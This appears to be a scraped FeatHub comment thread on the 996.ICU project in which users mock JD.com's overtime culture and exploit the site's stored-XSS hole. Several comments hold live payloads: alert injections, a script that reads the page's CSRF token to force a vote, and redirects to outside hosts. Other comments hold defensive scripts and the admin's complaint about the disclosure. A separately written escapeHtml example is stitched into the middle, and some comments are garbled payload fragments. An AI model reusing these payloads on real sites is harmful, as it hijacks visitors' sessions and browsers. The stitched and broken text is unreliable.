LinXueyuanStdio/996.ICU

JD.com (pretend this is pinned: voting works fine. Disable JavaScript to view the comments)

LinXueyuanStdio asked for this feature 10 months ago — 88 comments

LinXueyuanStdio commented 10 months ago Admin

cshsoft commented 10 months ago

Trash "second-hand JD". Rip-off artists.

chrisgang commented 10 months ago

641500461 commented 10 months ago

Shitty JD

nicle-lin commented 10 months ago

Really?

liyabin1105 commented 10 months ago

So many votes. Are you still Brother Dong's brothers?

lobtao commented 10 months ago

Brother Dong's comrades-in-arms

solebeibei commented 10 months ago

Brothers

ZenYuan commented 10 months ago

Brother Dong doesn't want his brothers any more

dblclick commented 10 months ago

Really treating us like bastards

Coleman-p commented 10 months ago

Honestly, people at small companies don't dare to post here, and the overtime there is even more brutal.

gxkyrftx commented 10 months ago

You're not Brother Dong's brothers any more, lol

linyusen1995 commented 10 months ago

How is Brother Dong supposed to take this?

shanrain commented 10 months ago

Brother Dong treats you as a brother, hahaha

ziiber commented 10 months ago

Hahahaha, are you still Brother Dong's brothers or not?

JHsunshine commented 10 months ago

Brothers, don't just vote, describe the actual situation too.

Simon-Leung commented 10 months ago

Serves him right to get honey-trapped. Dog JD.

17701253801 commented 10 months ago

I bet some companies are wetting themselves right now

saschapojot commented 10 months ago

Dong-dong-qiang is going to die miserably in the sewer with nobody caring, lol

nimil commented 10 months ago

Brother Dong treats you as brothers, and here you are voting

zncook commented 10 months ago

What happened to Milk Tea Sister in the end?

RicoLiu commented 10 months ago

Brother Dong treats you as brothers

BosenY commented 10 months ago

You're actually stabbing Brother Dong in the back

zhou-hai commented 10 months ago

Milk Tea Sister is crying her eyes out in the bathroom...

w460931543 commented 10 months ago

What happened

sorrymeto commented 10 months ago

China's GDP: the 996 work schedule genuinely contributes a lot.

mpkmapengkai commented 10 months ago

Does nobody here acknowledge Brother Dong any more?

renzhe12138 commented 10 months ago

Trash "second-hand JD"

multiplatformsgamer commented 10 months ago

This site uses GitHub accounts directly, so the nicknames are basically the same. How is that anonymous? And the site is too laggy.

prettychaoyao commented 10 months ago

Otherwise, how could Brother Dong afford the overnight fee?

sagiwei commented 10 months ago

Salary ranges, the more detailed the better??? There are a lot of opportunists here.

leyuxinsi commented 10 months ago

Are you all still Brother Dong's brothers or not.

y18zhou commented 10 months ago

JD doesn't have 996, does it? Looks like its culture just attracts too much hate.

zhaoqingzhi commented 10 months ago

gg

kanboom commented 10 months ago

666

yesjustnoname commented 10 months ago

You treat Dong as a brother; Dong treats you like a dog.

carolove commented 10 months ago

Haha, the day JD got roasted the hardest

ostopuro commented 10 months ago

lc338310659 commented 10 months ago

Apart from decent electronics and the seven-day no-questions-asked return policy, I don't have a good impression of JD.

qq1057119720 commented 10 months ago

Qiangdong: I treat you as a brother, and you're here quibbling over a little bit of time

gh0stkey commented 10 months ago

NinnHou commented 10 months ago

A sweatshop for programmers, huh.

redappless commented 10 months ago

Damn JD, how many people did it screw over in autumn campus recruiting interviews (upvote if you got screwed in last year's autumn recruiting). Insulting offers, unpaid overtime, worse than Huawei, fuck this

zhuanggy commented 10 months ago

JD Mall front-end system team: 995, overtime is ranked, no overtime pay.

skychx commented 10 months ago

/>alert('1')

d9823 commented 10 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

intrhuting commented 10 months ago

Brother Dong: I've brought my brothers a little gift: 996. Work hard, everyone, I won't shortchange you. OK, I'm heading home to keep Milk Tea Sister company.

zx1013196355 commented 10 months ago

Hehe

zx1013196355 commented 10 months ago

I want to be a bit different

a346076818886 commented 10 months ago

alert('111111')

qingfengjiang commented 10 months ago

alert('hello');

intrhuting commented 10 months ago

US-listed internet company, headquartered in Shanghai, with offices in Silicon Valley, Beijing, Shenzhen, Guangzhou and Taipei; global business, growing fast. Hiring for development, operations, product, sales, business development and design roles. Generous pay, start at 10, leave a little after 6, five days a week, no 996, no ICU. For a referral, add me on WeChat: sharehealthy

jokyme commented 10 months ago

">

666sbX commented 10 months ago

jokyme, think that while loop is funny? Remember one thing: your elders are still your elders.

MagicGary commented 10 months ago

MagicGary commented 10 months ago

window.alert = function() { return false; }

LinXueyuanStdio commented 10 months ago Admin

table{visibility: collapse;}

LinXueyuanStdio commented 10 months ago Admin

var commentBodySet = document.getElementsByClassName("body");for(var i=0;i

leo66123 commented 10 months ago

VeHan commented 10 months ago

Are you all devils?

VeHan commented 10 months ago

Come flame this guy, he put in an infinite loop

https://github.com/leo66123/leo66123.github.io/issues/1

LinXueyuanStdio commented 10 months ago Admin

img,svg,table{visibility: collapse;}

xilibili commented 10 months ago

618 fell on the Dragon Boat Festival, and you weren't even allowed to file the 0:00-to-24:00 overtime...

reinit commented 10 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 10 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

ThomasHuang025 commented 10 months ago

// Watch the whole document for newly added nodes and neutralise any <script>
// element that appears (posted as a client-side workaround for the injected comments).
const observer = new MutationObserver(mutations => {
  mutations.forEach(({ addedNodes }) => {
    addedNodes.forEach(node => {
      if (node.tagName === 'SCRIPT') {
        // Mark the element with a non-JavaScript type and detach it from the DOM.
        node.type = 'javascript/blocked'
        node.parentElement.removeChild(node)
        // 'beforescriptexecute' is a non-standard event (historically Firefox only);
        // where it fires, preventDefault() cancels the script's execution.
        const beforeScriptExecuteListener = function (event) {
          event.preventDefault()
          node.removeEventListener('beforescriptexecute', beforeScriptExecuteListener)
        }
        node.addEventListener('beforescriptexecute', beforeScriptExecuteListener)
      }
    })
  })
})
observer.observe(document.documentElement, { childList: true, subtree: true })

LinXueyuanStdio commented 10 months ago Admin

I'm the admin, borrowing this thread to explain.

The Mister Security team (米斯特安全团队), which maliciously published the XSS attack method on WeChat official accounts, Zhihu and other platforms, never contacted me. The account I have linked to FeatHub clearly has an email address, yet I never received a single email about a vulnerability. In other words, as soon as they found the vulnerability they made it public, giving FeatHub no time to react at all, which violates the professional ethics an information security person should have.

Then there's the question of how to fix it. That's out of my hands, because FeatHub simply has no delete function. That is, you can't delete comments, you can't delete a project; apart from editing the title and opening/closing, there's nothing. And no, there's no README to add either, and no pinning (though the JD post can be used as a fake pin).

The XSS vulnerability can only be resolved by contacting the official site.. but I looked, and strangely, the official site gives no contact information... just a repo and a Twitter, neither updated in a long time..

(By the way, the officials are playing dead, yet with this much traffic the site still hasn't crashed; what kind of miracle server is this, hahaha)

superzmy commented 10 months ago

How about a script that automatically deletes script tags?

superzmy commented 10 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

zzxcvbnm19 commented 10 months ago

asdasd

zzxcvbnm19 commented 10 months ago

sadasd

zzxcvbnm19 commented 10 months ago

dasd

zzxcvbnm19 commented 10 months ago

sdasd

zzxcvbnm19 commented 10 months ago

zzxcvbnm19 commented 10 months ago

superzmy, bro, the last script you posted hid everything below it

zzxcvbnm19 commented 10 months ago

It was missing something; I closed it off for you ☺
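superzmy's approach above (blank any comment whose HTML mentions "script") is a client-side patch for a defect that can only be fixed where the comment is rendered: the page inserts comment text as HTML, so the fix is to output-encode it before insertion. The following is an added example, not code from this thread or from FeatHub, that puts the substring heuristic beside an HTML-escaping renderer and scores both on constructed sample comments. The first attack sample mirrors the residue left by skychx's post; the `onerror` variant, the function names and the sample set are assumptions of the example.

```javascript
// Added example (not FeatHub code): output encoding versus the "contains
// 'script'" heuristic from the thread, scored on constructed sample comments.

// Escape the five characters that let user text break out of an HTML text
// node or a quoted attribute value. Rendering comments through this instead
// of inserting their raw HTML is the server-side fix the site would need.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The heuristic posted in the thread: wipe any comment that mentions "script".
function heuristicStrip(html) {
  return html.indexOf("script") >= 0 ? "" : html;
}

// Constructed sample comments: two harmless ones, and two payload shapes.
// The first payload mirrors the residue visible in the thread; the second is a
// constructed variant that executes without containing the word "script".
const SAMPLES = [
  { id: "prose",   html: "How about a script that auto-deletes script tags?", attack: false },
  { id: "plain",   html: "JD Mall front-end: 995, no overtime pay.",          attack: false },
  { id: "script",  html: "\"/><script>alert('1')</script>",                   attack: true  },
  { id: "onerror", html: "<img src=x onerror=alert(1)>",                      attack: true  },
];

// Conservative check for this toy: any '<' that could still open a tag means
// the browser would parse the output as markup rather than as text.
function stillHasMarkup(rendered) {
  return /<[a-zA-Z!/]/.test(rendered);
}

// Score a defence over the samples. A false positive is a harmless comment
// that was blanked; a false negative is an attack whose markup survived.
function evaluate(defence) {
  let falsePositives = 0;
  let falseNegatives = 0;
  for (const sample of SAMPLES) {
    const out = defence(sample.html);
    if (!sample.attack && out === "") falsePositives++;
    if (sample.attack && stillHasMarkup(out)) falseNegatives++;
  }
  return { falsePositives, falseNegatives };
}

for (const [name, defence] of [["heuristicStrip", heuristicStrip], ["escapeHtml", escapeHtml]]) {
  console.log(name, evaluate(defence));
}
```

The heuristic blanks superzmy's own comment (it contains the word "script") and lets the `onerror` sample through untouched; escaping renders every sample as inert text. A Content-Security-Policy that omits `'unsafe-inline'` for `script-src` is the usual second layer, since it stops inline scripts even when encoding is missed somewhere.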

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" ; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。,。。

wtf996 commented 10 months ago

window.location.href='https://www.qwq.wtf/?from=XSS';

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

kongkongye commented 5 months ago

test
